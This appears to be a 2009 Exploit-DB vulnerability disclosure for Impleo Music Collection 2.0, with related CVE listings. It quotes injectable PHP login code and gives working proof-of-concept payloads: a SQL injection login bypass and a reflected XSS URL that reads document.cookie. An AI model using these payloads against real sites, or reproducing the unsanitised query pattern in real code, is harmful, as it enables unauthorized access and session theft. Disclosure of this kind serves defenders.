Lucene search
SirGodEDB-ID:8947HistoryJun 15, 2009 - 12:00 a.m.
impleo music Collection 2.0 - SQL Injection / Cross-Site Scripting
2009-06-1500:00:00
SirGod
www.exploit-db.com
37
AI Score
7.4
Confidence
Low
#################################################################################################################
[+] Impleo Music Collection 2.0 (SQL/XSS) Multiple Remote Vulnerabilities
[+] Download: http://sappy.dk/impleo/download-impleo
[+] Discovered By SirGod
[+] www.mortal-team.org
#################################################################################################################
[+] SQL Injection ( Auth Bypass )
- Requirements : magic_quotes_gpc = off
- Vulnerable code in /admin/login.php
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$postbruger = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'")
or die("<p>" . mysql_error() . "</p>\n");
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- PoC
Login Username : admin ' or ' 1=1
Login Password : anything
[+] Cross Site Scripting
- PoC
http://127.0.0.1/[path]/index.php?sort="><script>alert(document.cookie)</script>
#################################################################################################################
# milw0rm.com [2009-06-15]Related
nvd
nvd
CVE-2009-2154
2009-06-22 14:30:00
CVE-2009-2153
2009-06-22 14:30:00
cvelist
cvelist
CVE-2009-2153
2009-06-22 14:00:00
CVE-2009-2154
2009-06-22 14:00:00
prion
prion
Cross site scripting
2009-06-22 14:30:00
Sql injection
2009-06-22 14:30:00
cve
cve
CVE-2009-2153
2009-06-22 14:30:00
CVE-2009-2154
2009-06-22 14:30:00